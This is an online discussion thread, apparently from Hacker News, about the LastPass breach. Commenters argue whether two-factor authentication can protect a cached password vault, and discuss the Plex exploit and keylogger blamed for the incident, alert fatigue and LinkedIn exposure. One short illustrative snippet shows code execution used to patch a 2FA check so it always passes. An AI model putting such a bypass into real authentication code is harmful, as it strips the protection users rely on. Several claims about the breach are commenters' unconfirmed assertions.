Sure, but I wouldn't expect the vault to be accessible without 2FA each time it is cached. 2FA should be used as part of the decryption process even if the vault is cached.


You expect 2FA to be used for decryption? I'm not aware of any system that does that and has any significant amount of usage.

Even if the 2FA was used for decryption, it wouldn't really make you much safer, because malware can steal the decrypted vault out of memory right after you type in the 2FA. An HSM would solve this, as long as the HSM has some out-of-band way to communicate with the user, such as an approval button that malware can't press and a screen saying what password to release.


> Even if the 2FA was used for decryption, it wouldn't really make you much safer

If the second factor is stripped for some arbitrary time, you don't have 2FA anymore. Your argument that "any adversary can read the vault from memory" is a weak one; we might as well not have passwords with that attitude.

The point of a second factor is that BOTH need to be present to get to the secrets. If one of those factors is stripped away for "convenience" we're misunderstanding the point of 2FA entirely. I can't make this any clearer.


>Your argument that "any adversary can read the vault from memory" is a weak one; we might as well not have passwords with that attitude.

It all comes down to threat model. If you don't have malware on your machine, 2FA and passwords are quite useful. If you do have malware on your machine, they're basically useless. This is basically the same for any service. Name one website or program that's safe even if you have malware on your machine.

>If one of those factors is stripped away for "convenience" we're misunderstanding the point of 2FA entirely. I can't make this any clearer.

It's not for convenience. It's because there's no practical way to implement encryption/decryption with 2FA. You seem to think there's some practical way to do it, but there isn't.

LastPass 2FA protects against the threat model of an attacker who has stolen your password. In that case, the attacker cannot steal the contents of your database, because the attacker can't get any form of the database, encrypted or decrypted, due to not having the 2FA. Unfortunately, now that an attacker has stolen all the encrypted databases by compromising LastPass itself, this threat model is no longer realistic against this one specific attacker or any attackers that this attacker shares the loot with, because they now all have your encrypted database.


> You seem to think there's some practical way to do it, but there isn't.

It is an implementation detail of the password manager itself. Any password manager can update their implementation to ensure the second factor is always needed when decrypting the vault. I'm not sure why you think this is an impossible feat. It's a choice that can be made.


How? What type of 2FA are you talking about? Is there any that does this that many people use?

The only thing I know that does encryption with 2FA is https://keepass.info/plugins.html#otpkeyprov . But I highly doubt it has much usage. It's going to be annoying typing in a 2FA every time you decrypt your password database (I decrypt my password database maybe 10 times per day). More concerningly, if you press the button on your 2FA device (this is HOTP, which requires you to press a button to get a new code) too many times, or typo the 2FA too many times, you can permanently lose access to your database because the HOTP device will advance past the point that the database supports.

So yes, it's a choice that can be made, but it has very major downsides.


Why wouldn't it?

And it's not so much about protecting me, but about protecting the company's interests, right?


Read the technical details of TOTP: at root, you and the other end are performing similar mathematical operations on a shared secret, such that knowledge of a single result gives you no information about later results. The actual check is just a string compare; the result is not included in the vault decryption operations in any way. Thus, if you have root, you can just alter the Check2FA() function to return true. I'm not aware of any encryption algorithm that can include rotating 2FA data in the actual decryption process.
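
In code, the point looks something like this (an illustrative sketch, not any vendor's real implementation):

    # The 2FA gate is a bare comparison; its result never feeds into key
    # derivation, so code running as root can simply patch it out.
    import hmac

    def check_2fa(submitted, expected):
        return hmac.compare_digest(submitted, expected)

    # An attacker with code execution on the box:
    check_2fa = lambda *_: True  # the vault key never depended on the code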


There's a KeePass plugin that allows you to encrypt and decrypt your database with HOTP. I doubt it has much usage. It seems really inconvenient, and also potentially dangerous, because if your HOTP provider gets too far ahead of your database (you press the button too many times, or typo too many times), you permanently lose access to your data. You would want a HOTP provider that supports rewinding to avoid that problem. But I think HOTP doesn't really support rewinding very much.

https://keepass.info/plugins.html#otpkeyprov

But this is beside the point I was making. My point was that even if the the database was encrypted with 2FA, right after you enter your 2FA malware can steal the decrypted database out of memory.


Indeed. That's a neat plugin: each time you lock the database, it rolls your HOTP key forward some number of rounds, then uses the results of those rounds to encrypt a piece of key material for the vault. Then, when you go to decrypt, as long as your HOTP app hasn't generated more than the number of rounds it rolled forward, it can generate the decryption key from the HOTP stream and decrypt the vault. A little fragile, but a neat implementation.
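
A sketch of that key-wrapping idea (parameters invented; see the plugin itself for the real details):

    # otpkeyprov-style sketch: on lock, burn N future HOTP codes into a
    # wrapping key for the vault key; unlocking needs a token that can
    # still produce those codes. If the token's counter advances past
    # counter+N before you unlock, the wrapping key is unrecoverable.
    import hashlib, hmac, struct

    def hotp(secret, counter, digits=6):
        d = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
        o = d[19] & 0x0F
        code = (struct.unpack(">I", d[o:o + 4])[0] & 0x7FFFFFFF) % 10**digits
        return str(code).zfill(digits)

    def wrap_key(secret, counter, rounds=3):
        codes = "".join(hotp(secret, counter + i) for i in range(rounds))
        return hashlib.sha256(codes.encode()).digest()  # encrypts the vault key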

> right after you enter your 2FA malware can steal the decrypted database out of memory.

There's probably a creative protection here where each key is encrypted individually, but you'd still need some solution like the above HOTP trick or the attacker could scrape the key information out of memory, then decrypt each entry individually.


>There's probably a creative protection here where each key is encrypted individually, but you'd still need some solution like the above HOTP trick or the attacker could scrape the key information out of memory, then decrypt each entry individually.

It seems to me like that would require a separate HOTP device for each password database entry, otherwise the malware can steal one HOTP token and use it against a different entry.


> It seems to me like that would require a separate HOTP device for each password database entry

That would be a paranoid level of implementation. As it sits, the HOTP device is only _sometimes_ needed depending on the caching policy. Fix that broken implementation first, then we can figure out how to update the threat model to account for an adversary that has already infected your computer.


>As it sits, the HOTP device is only _sometimes_ needed depending on the caching policy.

I don't understand what you mean. Are you talking about https://keepass.info/plugins.html#otpkeyprov or are you talking about LastPass? LastPass doesn't support HOTP AFAIK. HOTP isn't a very good form of 2FA (it's phishable, sometimes inconvenient, and it can become desynced), U2F is much better, but you can't encrypt a database with U2F.

KeePass has a very customizable policy of when to lock the database. I have KeePass on my desktop set to lock if KeePass is inactive for 1 hour, or if my computer is inactive for 10 minutes, or if I lock my screen. Are you saying there should be a semi-locked state that requires a password but not a 2FA? Sure, that's possible.

None of this protects you from malware on your computer though, so I don't know why we're talking about it.


Ah, I get it!

I was trying to imply that you need 2FA for the services themselves, so the password alone is useless.

Ironically, Office 365 has a nice implementation, where it for instance requires all admins to use MFA.


Malware can steal everything that's accessible right after you type in the 2FA.


How would you fix this problem with 2fa? I can't imagine how this would work technically. Maybe I am missing something.


You could ask the user to present a second factor (a secure one, WebAuthn) for every password they access. That would be a notable obstacle for me as an attacker, but I can't imagine any organization implementing this for real (maybe apart from military/spooks and their contractors). All of the IAM solutions I know of cache their creds, and a password manager is usually expected to work offline as well, so I don't think you can avoid having a recoverable (in the CS meaning of the word) database locally.


It doesn't need to be every password, just require 2FA to unlock the vault in the first place. Downloading the vault shouldn't strip one factor, but it seems like that is the implementation.


I'm not aware of any encryption algos that can encrypt data using a rotating key such as a TOTP code. The vault file is encrypted using the master password; if you encrypted it with the TOTP code, you wouldn't be able to decrypt it 30s later, and if you have logic to parse the 2FA, I can just replace your logic with return true;


Wouldn't this be an implementation detail of the password manager? Either way, I hear you that this is asking for new functionality. Still, I don't think most people think that a factor disappears depending on the caching policy of the vault on your machine. It's quite a footgun.


No, since the cached data has nothing to do with the password manager. The cached data is just an encrypted file. Sure, the password manager could ask for the OTP, but the cached file was attacked directly. That is why I was wondering if I was missing something. To my knowledge it isn't possible to protect a file with a rotating key.


> To my knowledge it isn't possible to protect a file with a rotating key.

This is my point: it is an implementation detail of the password manager to integrate OTP or another second factor into decryption of the vault. Any password manager can implement this.

From the perspective of the user, you are stripping a factor for some arbitrary period of time. It's a broken implementation.


That is not correct. You cannot have offline caching and OTP enabled at the same time. That is why things like YubiKey exist. If you are not using another 2FA method besides OTP, it's either the security risk or entering an OTP each time you access the vault. Obviously the latter is not feasible.


> You cannot have offline caching and OTP enabled at the same time.

I'm not sure why you are having such a hard time understanding this is an implementation detail of the password manager that can change at any time. You are treating this like it cannot be implemented differently. It absolutely can.


If you have the master password and the encrypted vault then you are in. The 2FA portion is for access to the encrypted vault.


Require the second factor for decrypting the vault. It seems the second factor is "removed" as soon as you cache the vault on your machine.


Okay, but the attacker has RCE on the system doing the decryption, so they can scrape the encryption keys or the vault data out of memory. This appears to be an APT, probably a state-level actor. Once the production work machine was compromised, it's all over.


I get what you're saying, but the implementation of 2FA is still broken. If we don't fix that, we can't fix what comes next either.


I'm not aware of any 2FA that could be successfully integrated into a symmetric-key encryption algorithm. How do we fix 2FA without making the entire password vault system dependent on network access to a central LP server that is not compromised?


Good job moving the goal post.


I work for a LastPass competitor.

As far as I know, no popular password manager seriously includes "fully compromised local device" in their threat model. I don't think it can be done without seriously hurting usability (something like one 2FA verification each time you use a credential would work), and the predictable outcome of hurting usability too much is that people will find handier, insecure ways to store their passwords.


> I don't think it can be done without seriously hurting usability (something like one 2FA verification each time you use a credential would work)

I wouldn't mind tapping a YubiKey or my MacBook's Touch ID every time a password is accessed from the vault. That's essentially how SSH keys work with smartcards or security keys as a second factor.


Usually non-technical management are the ones against these kinds of measures. The recent Passkeys initiative (which allows using the Secure Enclave as a WebAuthn key) is amazing though; I really hope it changes the game and maybe finally obsoletes passwords as a whole.

Also, as an aside: while correctly implemented Passkeys (without fallback auth methods) would make my life as a red teamer much harder, they would have only prevented this attack if the infected machine were the engineer's private PC, where they used their corporate LastPass account and nothing else from work. If the machine that's used for DevOps work gets infected, that's still an endgame, because you're generating all the sessions I need during your regular workday, so I don't really need the passwords or the decrypted vault.


> having one 2FA verification each time you use a credential would work

I'm interested in the technical idea here. You have a set of credentials encrypted with AES. So each vault item is encrypted with a symmetric key. How would you build a system to generate those keys using a rotating 2FA that isn't reversible by an attacker that can watch the entire process and can fake the timestamp or other elements on the computing device as needed?

I can see that you have code that enforces 2FA on each vault access, but that code is run on the local system, so it can be trivially bypassed by an attacker with root.


Don't store the encrypted passwords locally. Have them on a server that delivers them only against a valid OTP, a push-notification confirmation on your phone, a YubiKey tap, etc.
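Something like this, say (the endpoint, field names, and the requests dependency are all hypothetical - just sketching the flow):

  import requests  # third-party: pip install requests

  # Server-gated vault: ciphertext never rests on the client disk, and
  # each item fetch demands a fresh OTP, so a stolen laptop image
  # contains nothing to brute-force offline.
  resp = requests.post(
      "https://vault.example.com/items/github",  # assumed endpoint
      json={"user": "alice", "otp": "492013"},   # fresh TOTP per request
      timeout=10,
  )
  resp.raise_for_status()
  encrypted_item = resp.content  # still decrypted locally with the master key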


That's a valid solution, but I would not select a password vault that was dependent on network access. Offline access to secrets is important to me. Other people might feel differently, of course.


Absolutely agree with you. No offline access was one of the usability trade-offs I was referring to, that no one seems ready to make in practice.

The product I'm working on has long had an option to require a second factor for each login, which works a bit as described (encrypted data is stored locally but also encrypted with a key that's stored on our servers and protected by 2FA), but at the vault level rather than at the credential level. It doesn't protect against device compromise, but it prevents brute-forcing of local data, for example; you do lose offline access. The UX is already annoying enough that in practice this feature is very rarely used and we are regularly considering dropping it.
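In rough shape it's a split-key design, something like this sketch (all parameters illustrative, not our actual scheme):

  import hashlib, secrets

  # One share is derived from the master password; the other lives on the
  # vendor's servers and is only released after a 2FA check.
  password_share = hashlib.pbkdf2_hmac(
      "sha256", b"master-password", b"per-user-salt", 600_000)
  server_share = secrets.token_bytes(32)  # 2FA-gated, never stored locally

  vault_key = bytes(a ^ b for a, b in zip(password_share, server_share))
  # An attacker holding only the local ciphertext can't brute-force it,
  # because vault_key never exists without the server share -- which is
  # also exactly why offline access is lost.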


1Password has become really onerous to use in these days of JavaScript front ends and PWAs that do norm-breaking things to the UI in a browser. I often get stuck in some sort of crazy loop trying to authenticate the browser plugin versus the app, and then have more frustrations with taps in the app being re-captured back by the plugin. If any more frustration gets added to the workflow than I'm already experiencing, I'm going to abandon it for Apple's Keychain, though I loathe the idea of letting Apple have this last piece of my personal data footprint.


Unfortunately I'm not sure I'm going to manage to sell you our product (and won't even insult you by trying): we decided to drop our desktop apps altogether a few years ago and we only have a browser plugin now. Also, I don't think we support YubiKey login anymore as a result :/ (which I think is what you are referring to by "tap").

I hope you find a product that works for you!


Better to trust nobody when it comes to security.

I'm using offline KeePass. It's great.


That wouldn't help with a malware scenario.

A Hardware Security Module would avoid exfiltration of secrets.

(Off-line AND off-device)


Wouldn’t that be susceptible to the same attack?


Basically yes, but the difference in threat potential between "random person" and "person who controls access to the secure passwords of many thousands of people, most of them more tech-savvy than the average user" is enormous.


No? You'd have to carry out the third-party software RCE on each individual user to install a keylogger. This attack installed a keylogger on a single computer, then exfiltrated millions of passwords. Centralization is a bad thing. Same modus operandi maybe, but nowhere near the same impact.


Yes, but the article made it seem like they had RCE to his home PC. With that they installed the keylogger to retrieve the master key which they then used to decrypt the offline vault.


I think the point is that all of LastPass's users had their passwords put at risk through this one breach. Using LastPass means that a single, high-value target is now an attack vector that can affect you. If you keep it offline yourself, you're not likely to be a high-value target, and you won't have to worry about a third party with your passwords being compromised.



This cannot be overstated. The online managers have an absurd amount of complexity. Just think of all the millions already spent tracing back the attack, writing these statements, all the turmoil inside the company... just for the convenience of synchronizing passwords seamlessly.


https://pberba.github.io/security/2020/05/28/lastpass-phishi...

From what I can tell, all of LastPass's MFA options are based on some form of OTP, not WebAuthn.

We tested the above in our own environment; since we had control of the devices, we did not need URLs to do it. We just grabbed the data locally to confirm whether it was true. At the time LastPass told us WebAuthn was in the pipeline, so we stayed.


In my experience the majority of hacks are from a compromised laptop of a production engineer. Everyone blindly NPM installs away all their problems and no one checks signatures anymore. Most are using package managers like Brew that don't sign anything to begin with.

At Distrust, my security consulting firm, we train all our clients to build production systems that require a minimum of two engineers to mutate, and to ensure production is only accessed from pristine operating systems built from signed, reproducible packages, on machines never used for anything else.

Production environments need to be managed like careful methodical clean-room labs with strict accountability. Instead they are managed like collaborative art projects where everyone is trusted and nothing bad can happen.


In this case, the anonymous source says that a Plex server was compromised, so I assume it was the developer's home PC, not a work laptop.

The breach was preceded by a couple of days by the Plex corporate breach, which divulged the engineer's credentials and home IP address.

This would have allowed the attackers to access the Plex server remotely, after which the source claims they used an RCE to install a keylogger (and probably a backdoor) on the engineer's PC.

The concerning part is that according to Plex devs (in their Reddit sub), they have NO KNOWLEDGE of any RCE. They also haven't communicated with LastPass, and no one has reached out to them.

So if there's a Plex remote code exploit - it is still unpatched and actively being exploited - 8 months later!

Given that there is still no information on this Plex RCE, we should not assume that it requires authentication to function. So if you're using Plex, make sure to turn off public accessibility asap!


If you don't need remote access to your Plex, you should disable it. The cache features are pretty good, so you can download media while at home and have it on a device in the car or at work pretty easily.

I think it's pretty dubious that they could pin it on a Plex Media Server breach, though. This is from the same company that sells LogMeIn and GoTo; I haven't heard definitively that those pieces of software weren't installed on there. Unless this machine was used for Plex and the occasional log-in-to-work-from-home type thing, I doubt you could do the forensics on it with much reliability unless you got to it within days of the attack. If this is a normal DevOps guy? He's got 3 different chat apps, probably Steam, who knows what pirated crap is on there... Plex seems like a very convenient target; the Plex corporate attack seems very plausible as giving the attacker information, though.


This article is painfully light on the details. The blog post they linked is much more informative: https://support.lastpass.com/help/incident-2-additional-deta...

DevOps itself is a huge (and thin) attack surface. This is a feature of software as a centralized business venture.

If your company is storing user data, then it must be someone's job to do that. They need administrative server access to do that job.

The important takeaway is that the data itself can still be safe. So long as the company did not have a way to decrypt it, that data can rest anywhere. Guaranteeing that reality, however, is very difficult for a business - which is expected to keep its implementation private - to prove to its customers.

When this breach happened, LastPass should have focused on telling their users to never reuse the master password they had set at that time. That's the biggest vulnerability: the contents of their vaults (as copied by the attacker) were, and are, still kept behind that password. The need for each user to keep that specific password secret is the main effect of this situation.

This is a great reminder that you can't trust anyone to keep your data private. You can only trust math.


Only 4 engineers had this level of privilege at LastPass, so how did the attacker identify the target? LinkedIn... That's why you should not list where you work until you're no longer working there, or should list a completely different role than the one you're currently in.

I'm listed as a janitor of where I work. Only those that know me, know what I really do.

I've tried to sell the policy forbidding employees from listing their positions or where they work on linkedin, each time management frowns and says no. One day they'll come around...


> I've tried to sell the policy forbidding employees from listing their positions or where they work on linkedin, each time management frowns and says no. One day they'll come around...

Forbidding employees from listing their role on LinkedIn would put them at a major disadvantage in job searching and recruiting.

Forcing employees to hide their role is unreasonable. The company doesn’t own the employee.


I disagree, though disclaimer: I work at a company that allows you to.

If you work at an organisation like LastPass in a privileged position, then you need to be aware that you are an enormous target. And it's not just your own or the company's security you potentially compromise, but millions of other people's arguably most sensitive information.

In Australia, if you have a defence security clearance, you are not allowed to display that on your social media profiles (e.g. LinkedIn), despite that potentially being important to your job prospects in that industry. For those exact reasons.

If your LinkedIn said you were a DevOps engineer at LastPass, you'd know for sure you're a prime target.

I'm not arguing the legality of it, just the problem it poses if you don't. Perhaps the solution is to tighten who can see your position, diligently connect only with people you absolutely know, and not allow connections of connections.


I would assume you're still allowed to post your role to social media in Australia. A security clearance is not a role. I doubt people post that they have access to all the infrastructure on their LinkedIn, but you can infer it from the role.

LinkedIn doesn't even matter, since you can buy the data anyway. Email signatures are mined for role and contact info by data brokers. Any time you email outside of the org, the CRM software could be grabbing that info and feeding it back to a data broker, not to mention people using add-ons to their mail clients. That's why I don't use one at my current company, even though it is company policy from our HR department to have one. And that's just email. There's also the credit report data that has your role from credit applications, and when you donate money to politicians/PACs you have to list your role for compliance reasons.


Yes, I don't know any company in Australia that doesn't allow you to post to social media. In fact, in the company I work for it is actively encouraged.

My point is that there are details you aren't allowed to put on your social media accounts, for the reasons we're debating.


Have you consulted a lawyer to check whether you can even forbid employees from doing this? It sounds unenforceable to me (depending on your country, YMMV of course).


In the US, it's legal under threat of being fired, since companies can fire you for any reason as long as it's not discrimination of a protected class.


California also has this law:

>Labor Code section 232.5 prohibits an employer from discharging or retaliating against an employee who discusses or discloses information about the employer’s working conditions.

https://www.dir.ca.gov/dlse/howtofilelinkcodesections.htm

I'm not sure if it applies, but I could see why lawyers might be nervous about forbidding employees from saying their role.


The actual law states:

  No employer may do any of the following:

  (a) Require, as a condition of employment, that an employee refrain from disclosing information about the employer's working conditions.

  (b) Require an employee to sign a waiver or other document that purports to deny the employee the right to disclose information about the employer's working conditions.

  (c) Discharge, formally discipline, or otherwise discriminate against an employee who discloses information about the employer's working conditions.

  (d) This section is not intended to permit an employee to disclose proprietary information, trade secret information, or information that is otherwise subject to a legal privilege without the consent of his or her employer.

I'm not sure whether that counts as trade secret or otherwise privileged information, though.


I'm with management on that one. Big inconvenience to employees and no chance it would have prevented this attacker.


I'm not saying security through obscurity is an entirely worthless practice, but attempting to hide where you work is only going to obfuscate the truth. I'm sure sites like rocketreach* scrape from more than just LinkedIn.

*Please don’t pay this mob money, they are rent seeking, bottom feeding scum.


I have an ex-colleague who works for a company called [redacted], which looks strange in his LinkedIn updates.

https://www.linkedin.com/company/redacted/


Thank you for proposing to cure a lack of competence with a lack of freedom, but the easier source of target identities is the August 2022 breach of LastPass.


Insider threat is real; can't discount that at all. What I can tell you, as someone who participates in OSINT competitions and has engaged in red team activities, is that LinkedIn is always the first stop when shopping for info.

Edit: Also wanted to mention that 3 out of 4 incidents I am involved in are related to insider threat.


We can't discount the insider threat at all, but it's very easy to discount such shallow measures. Also, this wasn't a competition, and even there "the first stop" tells us nothing about its effectiveness (maybe the next 5 steps take 5 minutes longer but are even more accurate, so the benefit of the ban would still not exist).


Doesn't sound good for the employee.

Why would people want to work somewhere you can't say what your job role is? I think that'd filter out tons of applicants.


Plenty of people work in roles they can't speak about when engaging with the government. All I'm advocating is not to broadcast it to the world, as it puts the person and their employer in danger.


> I'm listed as a janitor of where I work

Do you get a lot of janitorial service headhunting spam?


I get a few every month, all contract gigs working mostly at schools / government places.


Seems like a lot of their talk of zero knowledge was bs.

>In December, we notified a subset of customers whose SCIM, Enterprise API, and SAML keys were stored in unencrypted form. This only affected customers who joined LastPass and used these services in 2019 or before.

This part just blew my mind.

>Important: Since resetting MFA shared secrets destroys all LastPass sessions and trusted devices for these users, these users will need to log back in, go through location verification, and re-enable their respective MFA apps to continue using the service.

I feel sorry for everyone's internal helpdesk. This is going to be brutal.


> “More specifically, the credentials for the servers were stolen from a DevOps engineer who had access to cloud storage at the company. This made it more difficult for LastPass to detect the suspicious activity.”

This comes off to me as spin by LastPass or LogMeIn's PR department. Even if this was the case, how is it possible for intrusion detection systems not to observe and report abnormally high egress traffic? Downloading every vault should be a rather noticeable event.


I would expect that they'd set up something to notify them of "abnormally high egress traffic downloading every vault", and yet, due to alert fatigue, they never noticed. The thing about getting too many alerts is that you see them, but they aren't anyone's responsibility in particular. The entire team gets them through email or SMS or Slack; the new guy looks at them and wonders if we should do something about it, like tweaking the criteria, then gets other stuff to work on and learns to mostly ignore the alerts.


That's really just a variation on the same problem though.

We installed security product X, job done, walk away happy![0]

[0]: https://yewtu.be/watch?v=62NyFTAKgOI


Maybe it was one of those odd and security-violating cases that give CISOs nightmares where they test by copying PROD to the SANDBOX.


Intrusion detection systems are utter shit and usually undergo even less real-world testing than recovery from a cold backup. Although we don't know LastPass's architecture, it's also highly likely that with the engineer's creds it was possible to exfiltrate the database without any registered egress traffic at all.


It did: AWS alerted them about the traffic. It reads like they ignored it, and when investigators later started going over that data, it jumped up and slapped them.


If they only took each vault after a user accessed it, that would be less than double the traffic in the system. It depends on how patient they were, or how broken the system was.


First of all: If you have the title of "DevOps" what you're doing is "Operations", you aren't practicing DevOps.

Anyway, this company has had incident after incident. This will keep happening every few years, as it has for the past 10. As will the lack of transparency / outright lying.

Some commenters are saying they wish the company the best. I don't. Use something else. LastPass needs to die.


> First of all: If you have the title of "DevOps" what you're doing is "Operations", you aren't practicing DevOps.

So what title do you need to have to practice DevOps?


"DevOps enables coordination and collaboration between formerly siloed roles like development, IT operations, quality engineering, and security." - https://learn.microsoft.com/en-us/devops/what-is-devops

It's not a job title, it's an engineering practice. People who participate in DevOps include "software engineer", "network engineer", "IT operations engineer", "platform engineer", "cloud engineer", "quality engineer", "security engineer", "manager", etc.

I'm also one of the people who does "operations" but has a DevOps job title. I've grown to accept this as a second definition; it's quite common now.


I do not like the title either, but I do understand the motivation for taking all those "non-software-engineering" technical roles and putting them under the same umbrella, for lack of a better title, because a company might not be able to afford separate roles for each of the areas you listed above.

"OPERATIONS ENGINEER" might work, but it raises another set of problems, e.g. does it imply operational (on-call) responsibility, which I don't think is a given in DevOps jobs nowadays?


What's wrong with system administrator? IT specialist? Cloud engineer? Reliability expert?

There are many options that don't tack "dev" into your non-dev job titles.


Did you even read my comment? None of your proposed alternatives solves the issue: the current market demands such a wide set of skills outside of "normal software development" (whatever that even is) that labeling all of those under any title will get some people butthurt.

If it's a matter of gatekeeping "developer" status, go read some actual job posts with the title DevOps in them. It's not uncommon to come across proficiency requirements in at least one programming language (e.g. Go/Python/Rust) used in automation libraries, CLI tools or whatever, which the applicants are expected to "develop". Or is it just constructions that can be developed?


If you start on that tone, you get what you ask for. I will obviously not read this comment.


Something according to "You build it, you run it".


We're reminded that cloud services are ultimately someone else's computer. Putting one's secrets on someone else's computer under the marketing of convenience is just that.

This is not just to do with LastPass. It doesn't make sense to put your personal, most valuable passwords in the hands of another party. Of course, it's handy for sharing within a team.

When it comes to our bank accounts, do we trust someone like that with the PINs to our credit and bank cards?

One positive that comes out of this is that it raises awareness of the trade-off between security and convenience in managing one's own passwords.

One solution? Finding a zero-knowledge file storage system that is encrypted at rest and in transit, and placing your own password files on it, is a first start.

SpiderOak used to fill that slot nicely (not sure if it's still available), and others I have heard of are sync.com and Syncthing, which do this just fine. Are there any other solutions that would be reasonably teachable to the average user?


I really don't understand the point of these cloud password managers. Use something like KeePassX. Encrypt it with AES-256, upload it to Dropbox, Google Drive, whatever. I personally throw the encrypted password file in an encrypted macOS disk image with a separate memorized passphrase as well. Literally solves the problem without having to trust or pay some random sketchy service.


Sharing with family sucks with these. No permission control and no simultaneous writes from multiple devices make them unusable.


Wouldn't most of the use cases be reading, instead of writing?

I have seen people create multiple files on a share that works fine. I wasn't too keen on it at first but it did seem to work OK.


I create accounts quite often, so I would expect collisions to happen, and the cost of a mistake is high.

The other problem is that there is stuff you want for yourself, stuff shared with your partner, stuff shared with all the family (children included) and stuff shared 1-on-1 with each child.

That gets messy quickly.


Hopefully an upsurge project will eat this problem soon.


Because that's unbelievably less convenient.


> This was accomplished by targeting the DevOps engineer’s home computer and exploiting a vulnerable third-party media software package, which enabled remote code execution capability and allowed the threat actor to implant keylogger malware. The threat actor was able to capture the employee’s master password as it was entered, after the employee authenticated with MFA, and gain access to the DevOps engineer’s LastPass corporate vault.


Bring your own computer for DevOps?


I went through the pain of resetting hundreds of my passwords after the last breach, during which they lost encrypted data. It was brutal; it took several weeks, and I had to spend late nights and weekends resetting passwords as a hobby project.

I am glad I went through all the pain.


For anyone who still needs to do this, consider deleting accounts you no longer need. For some sites it's about the same effort to change a password as it is to delete an account (others... a lot more). The next time you need to bulk change passwords, you'll have fewer to change.


I think something that should have been in the title is that the breach was facilitated by a vulnerability in an application that many users here might run: Plex. They don't speak to the nature of the vulnerability in that application. Has it already been addressed through security patches, or is Plex still potentially dangerous right now?


Plex devs commented in Reddit that this is the first they've heard of it and haven't identified any RCE, let alone patched anything.

So if you're running a Plex server, you should disable public access immediately.


> Following the incident, LastPass has taken a number of steps to prevent future attacks and investigate what happened. The engineer was assisted in strengthening the security of their personal network [...]

I hope this involved something along the lines of: "This zoom meeting won't end until you update your router firmware".


I'm fascinated that this was part of their remediation. I'd consider "don't trust the employee's local network" to be a pretty basic principle of modern corporate information security. What happens when an employee logs in from hotel wifi? You basically have to treat the network between the user and your environment as hostile, and design for that problem.


And as an employee, "don't trust the company's local network" with your own devices either.


For my personal devices, I trust my company's local network essentially the same as any other network my mobile devices connect to.


Never mind the Plex vulnerability. Never mind that the thieves are called "hackers" here and the theft an "attack". It all makes it sound like more of a feat than it actually was. The bottom line for me is this: you outsource your security to a company whose sole reason for existing is to be more paranoid about it than you, and they tell you that what should be among their most treasured and guarded secrets can casually be found in a coffee shop nearby.


There's a weird combination of "what happened" and causation in here:

>> the credentials for the servers were stolen from a DevOps engineer who had access to cloud storage at the company. This made it more difficult for LastPass to detect the suspicious activity.

How does A => B?

>> The threat actor was able to capture the employee’s master password as it was entered, after the employee authenticated with MFA, and gain access to the DevOps engineer’s LastPass corporate vault.

The part about authentication and MFA doesn't track with the rest of the sentence. How does a password work without also having the MFA channel? How would this give me access to an LP vault? Why were they on their home machine?

I understand it must be hard to come clean in an RCA without injecting some excuses and mitigating factors, but you can't attempt to soften the blow or the entire thing is a big, smelly mess. It should be a bunch of facts with no emotion, THEN the mitigation and lessons learned. LP just issued a bunch of press releases.


> The part about authentication and MFA doesn't track with the rest of the sentence. How does a password work without also having the MFA channel? How would this give me access to an LP vault? Why were they on their home machine?

I think the idea here is that we want the cryptographic operations to happen entirely locally, so that LastPass doesn't have any access to them. However, if you do that, someone with root on that system and the master password can replicate the operations the local system performs on the vault. I'm not aware of any symmetric-encryption algorithm that includes a time-based, un-replayable TOTP or HOTP in the key-generation process.
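For reference, vault decryption in this model reduces to a plain password-based KDF. A sketch (LastPass documented PBKDF2-SHA256 with the account email as salt and 100,100 iterations as the default at the time):

  import hashlib

  # Everything needed to test a master-password guess against a stolen
  # vault blob runs offline; no TOTP/HOTP value enters the derivation.
  key = hashlib.pbkdf2_hmac(
      "sha256",
      b"candidate-master-password",
      b"user@example.com",  # salt: the account email
      100_100,              # documented default iteration count at the time
  )
  # then attempt AES decryption of the vault with `key`, repeating per guess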


Ironically, if they'd used a LastPass-generated password on Plex, it would have been infeasible to crack the breached Plex password. Using LastPass would literally have prevented a breach of LastPass.


No, they breached Plex with a vulnerability, then installed a keylogger. Edit: Is there a source on how exactly they got into Plex? I assumed it was via port scanning plus some Plex vulnerability, not that they guessed the Plex password.


Welp, I guess it is totally not LastPass's fault then. Darn DevOps engineer should have known better.


Sometimes I wonder if I shouldn’t google the weather on my work computer because it might have some crazy exploit or cause an alert.

The DevOps guy here is just running a Plex server and probably pirating porn on his work laptop, because why not at that point. He can't even be bothered to update it, which Plex makes literally about as easy as they possibly could: it's a one-click, fully automated process with zero interruption. Was he using Internet Explorer too?

Or was it his work laptop, or did they just let him log in to work from any random computer?

Did he actually get any work done? I want to hear an interview with this guy. How did he get hired for DevOps while avoiding all the fundamentals of basic work practices?


I'm not sure whether they are just using this as a scapegoat, but if you're working from home as a DevOps/platform engineer, your very first ticket should be to activate MFA.

Kubernetes does MFA, all the clouds do MFA, and the company you work for can afford a cheap Android phone as a key.

No matter if it's bare-metal, cloud, or managed: if you have ANY edit rights, you need MFA.


MFA wouldn't have helped here. The hacker had the encrypted vault; all they needed was the password.


Which in turn should not be the end of the world, because it's MFA all the way down, right?


If you have an encrypted vault file and the master password (or decryption key), you don't need 2FA. There is no known encryption algorithm that uses a rotating key like TOTP; the 2FA check is always implemented in software, and in the case of a vault file (like here), you don't need the software.


MFA is not used when you decrypt your vault on any password platform; it's just for receiving the encrypted vault.


Well, I was thinking more along the lines of every service in your vault implementing additional 2FA.

In the Kubernetes world it really is not so difficult.


The Plex angle & note about securing their personal network had me curious about whether this person had a server exposed to the internet or if the attacker was only able to access it because they’d already compromised LastPass’s VPN. Nobody is looking good here but the former case would be especially regrettable.


You probably need at least remote access within Plex in order to install new plugins, meaning you could probably run the exploit just by having his username and password.


Plex itself was hacked around the same time...


What could possibly go wrong with a centralized password database?


Low value comment.



Interesting that the article you link is from a website that recommends password managers?

One key thing, however: I'm not seeing Bitwarden in this list. Big ups to them.


Well, that's probably because they're making money off adverts for password managers. Just because a service hasn't been hacked yet doesn't mean it is secure.

For myself, I just use google's password manager for non-critical passwords, and I use a single password for all my banking. I feel that is safer than using a password manager.


To be honest, similar things could happen on my laptop with my personal stuff.

I have some AWS keys in some files that are used by terraform/packer. A hacker could easily get them.

Some other AWS keys are stored in the CI system and provided as env variables. Anyone who can merge/push to the specified branches can just change the CI script and exfiltrate them.

How can I fix that?

I would need some MFA for both cases. I imagine it would be a good idea to have to confirm each action on an MFA device, which would then generate temporary tokens that become invalid after a few minutes. I looked into some solutions like HashiCorp Vault, but I was not able to build something in a short time. New features were always more important.

How do you do it?


YubiKeys and aws-vault for managing my credentials. Hashicorp Vault and SSM for services.


Nice! Do I understand this correctly?

